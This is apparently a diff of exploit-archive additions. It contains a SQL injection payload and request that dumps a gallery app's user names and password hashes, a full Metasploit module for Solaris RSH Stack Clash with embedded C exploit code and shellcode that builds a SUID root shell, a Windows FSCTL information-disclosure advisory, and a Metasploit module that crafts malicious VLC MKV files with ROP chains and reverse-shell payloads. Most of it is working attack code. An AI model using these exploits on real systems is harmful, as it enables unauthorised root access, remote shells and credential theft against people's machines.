# Exploit Title: GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection
# Dork: N/A
# Date: 2018-10-16
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://tradesouthwest.com
# Software Link: https://sourceforge.net/projects/giugalleryimageupload/
# Version: 0.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?category=[SQL]
%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+-
GET /[PATH]/index.php?category=Image%20Gallery%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 16 Oct 2018 00:23:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 2300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

552
exploits/solaris/local/45625.rb Executable file
View file

@ -0,0 +1,552 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris RSH Stack Clash Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in RSH on unpatched Solaris
systems which allows users to gain root privileges.
The stack guard page on unpatched Solaris systems is of
insufficient size to prevent collisions between the stack
and heap memory, aka Stack Clash.
This module uploads and executes Qualys' Solaris_rsh.c exploit,
which exploits a vulnerability in RSH to bypass the stack guard
page to write to the stack and create a SUID root shell.
This module has offsets for Solaris versions 11.1 (x86) and
Solaris 11.3 (x86).
Exploitation will usually complete within a few minutes using
the default number of worker threads (10). Occasionally,
exploitation will fail. If the target system is vulnerable,
usually re-running the exploit will be successful.
This module has been tested successfully on Solaris 11.1 (x86)
and Solaris 11.3 (x86).
},
'References' =>
[
['BID', '99151'],
['BID', '99153'],
['CVE', '2017-1000364'],
['CVE', '2017-3629'],
['CVE', '2017-3630'],
['CVE', '2017-3631'],
['EDB', '42270'],
['URL', 'http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html'],
['URL', 'https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash'],
['URL', 'https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt']
],
'Notes' => { 'AKA' => ['Stack Clash', 'Solaris_rsh.c'] },
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys Corporation', # Stack Clash technique and Solaris_rsh.c exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jun 19 2017',
'Privileged' => true,
'Platform' => ['unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' =>
[
['Automatic', {}],
['Solaris 11.1', {}],
['Solaris 11.3', {}]
],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/bind_netcat',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptInt.new('WORKERS', [true, 'Number of workers', '10']),
OptString.new('RSH_PATH', [true, 'Path to rsh executable', '/usr/bin/rsh'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def rsh_path
datastore['RSH_PATH']
end
def mkdir(path)
vprint_status "Creating '#{path}' directory"
cmd_exec "mkdir -p #{path}"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_file_for_cleanup path
end
def symlink(link_target, link_name)
print_status "Symlinking #{link_target} to #{link_name}"
rm_f link_name
cmd_exec "ln -sf #{link_target} #{link_name}"
register_file_for_cleanup link_name
end
def check
unless setuid? rsh_path
vprint_error "#{rsh_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{rsh_path} is setuid"
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
version = kernel_version
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless ['11.1', '11.3'].include? version
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
CheckCode::Detected
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
if target.name.eql? 'Automatic'
case kernel_version
when '11.1'
my_target = targets[1]
arg = 0
when '11.3'
my_target = targets[2]
arg = 1
else
fail_with Failure::NoTarget, 'Unable to automatically select a target'
end
else
my_target = target
end
print_status "Using target: #{my_target.name}"
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path
# Solaris_rsh.c by Qualys
# modified for Metasploit
workers = datastore['WORKERS'].to_i
root_shell = 'ROOT'
shellcode = '\x31\xc0\x50\x68'
shellcode << root_shell
shellcode << '\x89\xe3\x50\x53\x89\xe2\x50\x50'
shellcode << '\x52\x53\xb0\x3C\x48\x50\xcd\x91'
shellcode << '\x31\xc0\x40\x50\x50\xcd\x91Z'
exp = <<-EOF
/*
* Solaris_rsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631
* Copyright (C) 2017 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/fcntl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#ifndef timersub
#define timersub(a, b, result) \\
do { \\
(result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \\
(result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \\
if ((result)->tv_usec < 0) { \\
--(result)->tv_sec; \\
(result)->tv_usec += 1000000; \\
} \\
} while (0)
#endif
#define RSH "#{rsh_path}"
static const struct target * target;
static const struct target {
const char * name;
size_t s_first, s_last, s_step;
size_t l_first, l_last, l_step;
size_t p_first, p_last, p_step;
size_t a, b;
size_t i, j;
}
targets[] = {
{
.name = "Oracle Solaris 11.1 X86 (Assembled 19 September 2012)",
.s_first = 16*1024, .s_last = 44*1024, .s_step = 4096,
.l_first = 192, .l_last = 512, .l_step = 16,
.p_first = 0, .p_last = 8192, .p_step = 1,
.a = 0, .b = 15, .j = 12,
.i = 0x08052608 /* pop edx; pop ebp; ret */
},
{
.name = "Oracle Solaris 11.3 X86 (Assembled 06 October 2015)",
.s_first = 12*1024, .s_last = 44*1024, .s_step = 4096,
.l_first = 96, .l_last = 512, .l_step = 4,
.p_first = 0, .p_last = 4096, .p_step = 4,
.a = 0, .b = 3, .j = SIZE_MAX,
.i = 0x07faa7ea /* call *0xc(%ebp) */
},
};
#define ROOTSHELL "#{root_shell}"
static const char shellcode[] = "#{shellcode}";
static volatile sig_atomic_t sigalarm;
static void
sigalarm_handler(const int signum __attribute__((__unused__)))
{
sigalarm = 1;
}
#define die() do { \\
fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \\
exit(EXIT_FAILURE); \\
} while (0)
static int
is_suid_root(const char * const file)
{
if (!file) die();
static struct stat sbuf;
if (stat(file, &sbuf)) die();
if (!S_ISREG(sbuf.st_mode)) die();
return ((sbuf.st_uid == 0) && (sbuf.st_mode & S_ISUID));
}
static const char *
build_lca(const size_t l)
{
static const size_t shellcode_len = sizeof(shellcode)-1;
if (shellcode_len > 64) die();
if (shellcode_len % 16) die();
if (l < shellcode_len + target->a + target->b) die();
#define LCA_MAX 4096
if (l > LCA_MAX) die();
static char lca[128 + LCA_MAX];
strcpy(lca, "LC_ALL=");
char * cp = memchr(lca, '\\0', sizeof(lca));
if (!cp) die();
memcpy(cp, shellcode, shellcode_len);
cp += shellcode_len;
memset(cp, 'a', target->a);
size_t o;
for (o = target->a; l - o >= 4; o += 4) {
if ((o - target->a) % 16 == target->j) {
cp[o + 0] = '\\xeb';
cp[o + 1] = (o - target->a >= 16) ? -(16u + 2u) :
-(shellcode_len + target->a + target->j + 2);
cp[o + 2] = 'j';
cp[o + 3] = 'j';
} else {
if (sizeof(size_t) != 4) die();
*(size_t *)(cp + o) = target->i;
}
}
cp += o;
memset(cp, 'b', target->b);
cp[target->b] = '\\0';
if (strlen(lca) != 7 + shellcode_len + o + target->b) die();
return lca;
}
static const char *
build_pad(const size_t p)
{
#define PAD_MAX 8192
if (p > PAD_MAX) die();
static char pad[64 + PAD_MAX];
strcpy(pad, "P=");
char * const cp = memchr(pad, '\\0', sizeof(pad));
if (!cp) die();
memset(cp, 'p', p);
cp[p] = '\\0';
if (strlen(pad) != 2 + p) die();
return pad;
}
static void
fork_worker(const size_t s, const char * const lca, const char * const pad)
{
#define N_WORKERS #{workers.to_i}
static size_t n_workers;
static struct {
pid_t pid;
struct timeval start;
} workers[N_WORKERS];
size_t i_worker;
struct timeval start, stop, diff;
if (n_workers >= N_WORKERS) {
if (n_workers != N_WORKERS) die();
int is_suid_rootshell = 0;
for (;;) {
sigalarm = 0;
#define TIMEOUT 10
alarm(TIMEOUT);
int status = 0;
const pid_t pid = waitpid(-1, &status, WUNTRACED);
alarm(0);
if (gettimeofday(&stop, NULL)) die();
if (pid <= 0) {
if (pid != -1) die();
if (errno != EINTR) die();
if (sigalarm != 1) die();
}
int found_pid = 0;
for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
const pid_t worker_pid = workers[i_worker].pid;
if (worker_pid <= 0) die();
if (worker_pid == pid) {
if (found_pid) die();
found_pid = 1;
if (WIFEXITED(status) || WIFSIGNALED(status))
workers[i_worker].pid = 0;
} else {
timersub(&stop, &workers[i_worker].start, &diff);
if (diff.tv_sec >= TIMEOUT)
if (kill(worker_pid, SIGKILL)) die();
}
}
if (!found_pid) {
if (pid != -1) die();
continue;
}
if (WIFEXITED(status)) {
if (WEXITSTATUS(status) != EXIT_FAILURE)
fprintf(stderr, "exited %d\\n", WEXITSTATUS(status));
break;
} else if (WIFSIGNALED(status)) {
if (WTERMSIG(status) != SIGSEGV)
fprintf(stderr, "signal %d\\n", WTERMSIG(status));
break;
} else if (WIFSTOPPED(status)) {
fprintf(stderr, "stopped %d\\n", WSTOPSIG(status));
is_suid_rootshell |= is_suid_root(ROOTSHELL);
if (kill(pid, SIGKILL)) die();
continue;
}
fprintf(stderr, "unknown %d\\n", status);
die();
}
if (is_suid_rootshell) {
system("ls -lL " ROOTSHELL);
exit(EXIT_SUCCESS);
}
n_workers--;
}
if (n_workers >= N_WORKERS) die();
static char rsh_link[64];
if (*rsh_link != '/') {
const int rsh_fd = open(RSH, O_RDONLY);
if (rsh_fd <= STDERR_FILENO) die();
if ((unsigned int)snprintf(rsh_link, sizeof(rsh_link),
"/proc/%ld/fd/%d", (long)getpid(), rsh_fd) >= sizeof(rsh_link)) die();
if (access(rsh_link, R_OK | X_OK)) die();
if (*rsh_link != '/') die();
}
static int null_fd = -1;
if (null_fd <= -1) {
null_fd = open("/dev/null", O_RDWR);
if (null_fd <= -1) die();
}
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
const struct rlimit stack = { s, s };
if (setrlimit(RLIMIT_STACK, &stack)) die();
if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();
if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();
static char * const argv[] = { rsh_link, "-?", NULL };
char * const envp[] = { (char *)lca, (char *)pad, NULL };
execve(*argv, argv, envp);
die();
}
if (gettimeofday(&start, NULL)) die();
for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
const pid_t worker_pid = workers[i_worker].pid;
if (worker_pid > 0) continue;
if (worker_pid != 0) die();
workers[i_worker].pid = pid;
workers[i_worker].start = start;
n_workers++;
return;
}
die();
}
int main(const int argc, const char * const argv[])
{
static const struct rlimit core;
if (setrlimit(RLIMIT_CORE, &core)) die();
if (geteuid() == 0) {
if (is_suid_root(ROOTSHELL)) {
if (setuid(0)) die();
if (setgid(0)) die();
static char * const argv[] = { "/bin/sh", NULL };
execve(*argv, argv, NULL);
die();
}
chown(*argv, 0, 0);
chmod(*argv, 04555);
for (;;) {
raise(SIGSTOP);
sleep(1);
}
die();
}
const size_t i = strtoul(argv[1], NULL, 10);
if (i >= sizeof(targets)/sizeof(*targets)) die();
target = targets + i;
fprintf(stderr, "Target %zu %s\\n", i, target->name);
if (target->a >= 16) die();
if (target->b >= 16) die();
if (target->i <= 0) die();
if (target->j >= 16 || target->j % 4) {
if (target->j != SIZE_MAX) die();
}
static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };
if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();
size_t s;
for (s = target->s_first; s <= target->s_last; s += target->s_step) {
if (s % target->s_step) die();
size_t l;
for (l = target->l_first; l <= target->l_last; l += target->l_step) {
if (l % target->l_step) die();
const char * const lca = build_lca(l);
fprintf(stdout, "s %zu l %zu\\n", s, l);
size_t p;
for (p = target->p_first; p <= target->p_last; p += target->p_step) {
if (p % target->p_step) die();
const char * const pad = build_pad(p);
fork_worker(s, lca, pad);
}
}
}
fprintf(stdout, "Failed\\n");
}
EOF
exploit_name = ".#{rand_text_alphanumeric 5..15}"
upload_and_compile "#{base_path}/#{exploit_name}", exp
symlink "#{base_path}/#{exploit_name}", "#{base_path}/#{root_shell}"
print_status "Creating suid root shell. This may take a while..."
cmd_exec "cd #{base_path}"
start = Time.now
output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800
stop = Time.now
print_status "Completed in #{(stop - start).round(2)}s"
unless output.include? 'root'
fail_with Failure::Unknown, "Failed to create suid root shell: #{output}"
end
print_good "suid root shell created: #{base_path}/#{root_shell}"
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"
upload payload_path, payload.encoded
cmd_exec "chmod +x '#{payload_path}'"
print_status 'Executing payload...'
cmd_exec "echo #{payload_path} | ./#{root_shell} & echo "
end
end

27
exploits/windows/dos/45624.txt Normal file
View file

@ -0,0 +1,27 @@
Windows: FSCTL_FIND_FILES_BY_SID Information Disclosure
Platform: Windows 10 (1709, 1803)
Class: Information Disclosure / Elevation of Privilege
Summary: The FSCTL_FIND_FILES_BY_SID control code doesnt check for permissions to list a directory leading to disclosure of file names when a user is not granted FILE_LIST_DIRECTORY access.
Description: The FSCTL_FIND_FILES_BY_SID is documented to return a list of files in a directory for a specific owner. This only works when Quotas are tracked on the device which isnt a default configuration, but could be common especially on shared terminal servers. The FSCTL code is specified for FILE_ANY_ACCESS so its possible to issue it for any handle on a directory regardless of the access granted, including SYNCHRONIZE.
At least when run on an NTFS volume no check seems to occur later in the process to ensure the caller would have some sort of access to the directory which would grant them the ability to list the directory. This allows a less privileged attacker to list the file names in a directory which theyve been granted some access, but not FILE_LIST_DIRECTORY access. A good example of such a directory on a standard installation is the Windows\Temp folder, which grants creation access to BUILTIN\Users but not the ability to list the files. This is used in part as a security measure to allow system services to create files and folders in that directory which a normal user cant easily list.
Proof of Concept:
Ive provided a PoC as a C# project. It will take a path to a directory (which must be on a quota tracking volume), open that directory for Synchronize access and then list files belonging to the current owner. I have tested querying other user SIDs such as BUILTIN\Administrator so its not some bypass due to the current user. Note that this just simulates the behavior by only opening for Synchronize access, but I have also tested it works on directories where the user hasnt been granted FILE_LIST_DIRECTORY.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Ensure the volume has quota tracking enabled. You can enable it from the command line with fsutil quota track X: as an administrator.
3) Run the poc, passing the path to a directory on the volume containing files owned by the current user.
Expected Result:
An error should be returned indicating the user cant access the directory.
Observed Result:
The files owned by the user are listed to the console.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45624.zip

306
exploits/windows/local/45626.rb Executable file
View file

@ -0,0 +1,306 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VLC Media Player MKV Use After Free',
'Description' => %q(
This module exploits a use after free vulnerability in
VideoLAN VLC =< 2.2.8. The vulnerability exists in the parsing of
MKV files and affects both 32 bits and 64 bits.
In order to exploit this, this module will generate two files:
The first .mkv file contains the main vulnerability and heap spray,
the second .mkv file is required in order to take the vulnerable code
path and should be placed under the same directory as the .mkv file.
This module has been tested against VLC v2.2.8. Tested with payloads
windows/exec, windows/x64/exec, windows/shell/reverse_tcp,
windows/x64/shell/reverse_tcp. Meterpreter payloads if used can
cause the application to crash instead.
),
'License' => MSF_LICENSE,
'Author' => [
'Eugene Ng - GovTech', # Vulnerability Discovery, Exploit
'Winston Ho - GovTech', # Metasploit Module
],
'References' =>
[
['CVE', '2018-11529'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11529'],
['EDB', '44979']
],
'Payload' =>
{
'Space' => 0x300,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' => [
[
'VLC 2.2.8 on Windows 10 x86',
{
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Ret' => 0x22000020,
'ExitPointer' => 0x00411364,
'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'},
'RopChain' => [
0x0040ae91, # XCHG EAX,ESP # ADD BYTE PTR [ECX],AL # MOV EAX,DWORD PTR [EAX] # RET
0x00407086, # POP EDI # RETN [vlc.exe]
0x00000040, # 0x00000040-> edx
0x0040b058, # MOV EDX,EDI # POP ESI # POP EDI # POP EBP # RETN [vlc.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x004039c7, # POP EAX # POP ECX # RETN [vlc.exe]
0x22000030, # Filler (compensate) for rol [eax] below
0x41414141, # Filler (compensate)
0x004039c8, # POP ECX # RETN [vlc.exe]
0x0041193d, # &Writable location [vlc.exe]
0x00409d18, # POP EBX # RETN [vlc.exe]
0x00000201, # 0x00000201-> ebx
0x0040a623, # POP EBP # RETN [vlc.exe]
0x0040a623, # POP EBP # RETN [vlc.exe]
0x004036CB, # POP ESI # RETN [vlc.exe]
0x0040848c, # JMP ds:[EAX * 4 + 40e000] [vlc.exe]
0x00407086, # POP EDI # RETN [vlc.exe]
0x0040ae95, # MOV EAX,DWORD PTR [EAX] # RETN [vlc.exe]
0x0040af61, # PUSHAD # ROL BYTE PTR [EAX], 0FFH # LOOPNE VLC+0XAEF8 (0040AEF8)
0x22000020 + 0x5e0, # Shellcode
]
}
],
[
'VLC 2.2.8 on Windows 10 x64',
{
'Platform' => 'win',
'Arch' => [ARCH_X64],
'Ret' => 0x40000040,
'ExitPointer' => 0x00412680,
'DefaultOptions' => {'PAYLOAD' => 'windows/x64/shell/reverse_tcp'},
'RopChain' => [
0x004037ac, # XCHG EAX,ESP # ROL BL,90H # CMP WORD PTR [RCX],5A4DH # JE VLC+0X37C0 (00000000`004037C0) # XOR EAX,EAX # RET
0x00403b60, # POP RCX # RET
0x40000040, # lpAddress
0x004011c2, # POP RDX # RET
0x00001000, # dwSize
0x0040ab70, # JMP VirtualProtect
0x40000040 + 0x700, # Payload
]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 24 2018',
'DefaultTarget' => 1))
register_options [
OptString.new('MKV_ONE', [false, 'mkv that should be opened', '']),
OptString.new('MKV_TWO', [false, 'The auxiliary file name.', ''])
]
deregister_options('FILENAME')
end
def to_bytes(num, length, endianess = 'big')
h = format('%<num>x', num: num)
s = ('0' * (h.length % 2) + h).rjust(length * 2)
s = s.scan(/.{2}/).map! { |x| x.hex.chr }.join
endianess == 'big' ? s : s.reverse
end
def data_size(number, numbytes = (1...9))
# encode 'number' as an EBML variable-size integer.
numbytes = [numbytes] if numbytes.is_a?(Integer)
numbytes.each do |size|
bits = size * 7
return to_bytes(((1 << bits) + number), size) if number <= (1 << bits) - 2
end
fail_with(Failure::BadConfig, "Can't store #{number} in #{size} bytes")
end
def build_data(size)
block_size = 0x1000
if target.arch.first == ARCH_X64
target_address_packed = [target.ret].pack("<Q")
rop_chain = target['RopChain'].map { |qword| [qword].pack("<Q") }.join
if size == 0x180
uaf_object = "\x41" * size
uaf_object[0x30, 8] = target_address_packed
uaf_object[0x38, 8] = [target.ret + 0x10000].pack("<Q")
uaf_object[0x168, 8] = [target.ret + 0x3c0].pack("<Q")
uaf_object[0x170, 8] = target_address_packed
return uaf_object
else
block = "\x00" * block_size
block[0x0, 4] = "\x41" * 4
block[0x8, target_address_packed.length] = target_address_packed
block[0x10, target_address_packed.length] = target_address_packed
block[0x40, 8] = [0x1].pack("<Q")
block[0x58, 8] = [target.ret + 0x3a8].pack("<Q")
block[0xE4, 8] = [0x1].pack("<Q")
block[0x1b8, 8] = [target.ret + 0x80].pack("<Q")
block[0x3b8, rop_chain.length] = rop_chain
block[0x6d8, 8] = [target.ret + 0x10].pack("<Q")
block[0x700, payload.encoded.length] = payload.encoded
block *= size / block.length + 1
end
return block[0, size]
elsif target.arch.first == ARCH_X86
target_address_packed = [target.ret].pack("<I")
rop_chain = target['RopChain'].map { |dword| [dword].pack("<I") }.join
if size == 0x100
uaf_object = "\x41" * size
uaf_object[0x28, 4] = target_address_packed
uaf_object[0x2c, 4] = [target.ret + 0x10000].pack("<I")
uaf_object[0xf4, 4] = [target.ret + 0x2bc].pack("<I")
uaf_object[0xf8, 4] = target_address_packed
return uaf_object
else
block = "\x00" * block_size
block[0x0, 4] = [0x22000040].pack("<I")
block[0x4, target_address_packed.length] = target_address_packed
block[0x8, target_address_packed.length] = target_address_packed
block[0x10, 4] = [0xc85].pack("<I")
block[0x30, 4] = [0x1].pack("<I")
block[0xc0, 4] = [0x1].pack("<I")
block[0x194, 4] = [0x2200031c].pack("<I")
block[0x2c0, 4] = [0x220002e4].pack("<I")
block[0x2f4, 4] = [0x22000310].pack("<I")
block[0x2f8, rop_chain.length] = rop_chain
block[0x564, 4] = [0x22000588].pack("<I")
block[0x5e0, payload.encoded.length] = payload.encoded
block *= size / block.length + 1
end
return block[0, size]
end
end
def generate_mkv
# EBML Header
doc_type = "\x42\x82" << data_size(8) << "matroska"
ebml = "\x1a\x45\xdf\xa3" << data_size(doc_type.length) << doc_type
# Seek Entries
seek_entry = "\x53\xab" << data_size(4) # SeekID
seek_entry << "\x15\x49\xa9\x66" # KaxInfo
seek_entry << "\x53\xac" << data_size(2) << "\xff" * 2 # SeekPosition + Index of Segment info
seek_entries = "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry
seek_entry = "\x53\xab" << data_size(4) # SeekID
seek_entry << "\x11\x4d\x9b\x74" # KaxSeekHead
seek_entry << "\x53\xac" << data_size(4) << "\xff" * 4 # SeekPosition + Index of SeekHead
seek_entries << "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry
seek_entry = "\x53\xab" << data_size(4) # SeekID
seek_entry << "\x10\x43\xa7\x70" # KaxChapters
seek_entry << "\x53\xac" << data_size(4) << "\xff" * 4 # SeekPosition + Index of Chapters
seek_entries << "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry
# SeekHead
seek_head = "\x11\x4d\x9b\x74" << data_size(seek_entries.length) << seek_entries
# Void
void = "\xec" << data_size(2) << "\x41" # Trigger bug with an out-of-order element
# Info
segment_uid = "\x73\xa4" << data_size(16) << rand_text(16)
info = "\x15\x49\xa9\x66" << data_size(segment_uid.length) << segment_uid
# Chapters
chapter_segment_uid = "\x6e\x67" << data_size(16) << rand_text(16)
chapter_atom = "\xb6" << data_size(chapter_segment_uid.length) << chapter_segment_uid
edition_entry = "\x45\xb9" << data_size(chapter_atom.length) << chapter_atom
chapters = "\x10\x43\xa7\x70" << data_size(edition_entry.length) << edition_entry
if target.arch.first == ARCH_X86
size = 0x100
count = 30
elsif target.arch.first == ARCH_X64
size = 0x180
count = 60
end
# Attachments
attached_files = ""
mime = "\x46\x60" << data_size(24) << "application/octet-stream"
data = build_data(size)
data = "\x46\x5c" << data_size(data.length) << data
500.times do
uid = "\x46\xae" << data_size(8) << rand_text(8)
file_name = "\x46\x6e" << data_size(8) << rand_text(8)
header = "\x61\xa7" << data_size(uid.length + file_name.length + mime.length + data.length)
attached_files << header << file_name << mime << uid << data
end
attachments = "\x19\x41\xa4\x69" << data_size(attached_files.length) << attached_files
# Cluster
pay_load = build_data(0xfff000)
# Since the payload is simply repeated payload blocks appended to cluster then segment_data,
# we return the simple_block and the count to process later instead.
# This should result is overall lowered memory usage during payload generation
simple_block = "\xa3" << data_size(pay_load.length) << pay_load
simple_blocks_len = simple_block.length * count
time_code = "\xe7" << data_size(1) << "\x00"
cluster = "\x1f\x43\xb6\x75" << data_size(time_code.length + simple_blocks_len) << time_code
# Concatenate everything
segment_data = seek_head << void << info << chapters << attachments << cluster
segment = "\x18\x53\x80\x67" << data_size(segment_data.length + simple_blocks_len) << segment_data
mkv = ebml << segment
return mkv, simple_block, count
end
def exploit
mkv1, simple_block, count = generate_mkv
mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10)
tmpname = rand_text_alpha_lower(3..8)
f1 = datastore['MKV_ONE'].empty? ? "#{tmpname}-part1.mkv" : datastore['MKV_ONE']
f1 << '.mkv' unless f1.downcase.end_with?('.mkv')
f2 = datastore['MKV_TWO'].empty? ? "#{tmpname}-part2.mkv" : datastore['MKV_TWO']
f2 << '.mkv' unless f2.downcase.end_with?('.mkv')
file_format_filename(f1)
file_create(mkv1)
print_status("Created #{f1}. Target should open this file")
file_format_filename(f2)
file_create(mkv2)
print_status("Created #{f2}. Put this file in the same directory as #{f1}")
print_status("Appending blocks to #{f1}")
path = File.join(Msf::Config.local_directory, f1)
full_path = ::File.expand_path(path)
File.open(full_path, 'ab') do |fd|
count.times { fd.write(simple_block) }
end
print_good("Succesfully appended blocks to #{f1}")
end
def file_format_filename(name = '')
name.empty? ? @fname : @fname = name
end
end

13
files_exploits.csv
View file

@ -6138,6 +6138,7 @@ id,file,description,date,author,type,platform,port
45493,exploits/windows_x86/dos/45493.py,"TransMac 12.2 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
45494,exploits/windows_x86/dos/45494.py,"CrossFont 7.5 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
45527,exploits/windows_x86/dos/45527.py,"FTP Voyager 16.2.0 - Denial of Service (PoC)",2018-10-03,"Abdullah Alıç",dos,windows_x86,
45624,exploits/windows/dos/45624.txt,"Microsoft Windows - 'FSCTL_FIND_FILES_BY_SID' Information Disclosure",2018-10-16,"Google Security Research",dos,windows,
45544,exploits/linux/dos/45544.sh,"net-snmp 5.7.3 - Unauthenticated Denial of Service (PoC)",2018-10-08,"Magnus Klaaborg Stubman",dos,linux,
45547,exploits/linux/dos/45547.txt,"net-snmp 5.7.3 - Authenticated Denial of Service (PoC)",2018-10-08,"Magnus Klaaborg Stubman",dos,linux,
45557,exploits/linux/dos/45557.c,"Linux - Kernel Pointer Leak via BPF",2018-10-08,"Google Security Research",dos,linux,
@ -10032,6 +10033,8 @@ id,file,description,date,author,type,platform,port
45585,exploits/windows/local/45585.txt,"Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
